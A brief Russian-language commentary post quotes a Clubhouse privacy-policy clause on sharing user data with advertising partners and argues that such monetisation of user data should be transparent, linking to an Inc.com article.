«Мы можем передавать идентификационные данные и данные об активности в Интернете платформам социальных сетей и другим партнёрам по рекламе, которые будут использовать эту информацию для предоставления вам целевой рекламы на платформах социальных сетей и других сторонних веб-сайтах - согласно определённым правилам такой обмен может считаться «продажей» персональных данных.»

Кажется довольно очевидным, что Clubhouse готовится монетизировать платформу, которую строит. Это справедливо - у каждого бизнеса должен быть план зарабатывания денег. Если этот план включает в себя монетизацию действий и данных пользователей, я думаю, мы все можем согласиться, что этот факт должен быть открытым и прозрачным.

***

https://www.inc.com/jason-aten/clubhouse-is-recording-your-c...

Показать полностью
Отличная работа, все прочитано!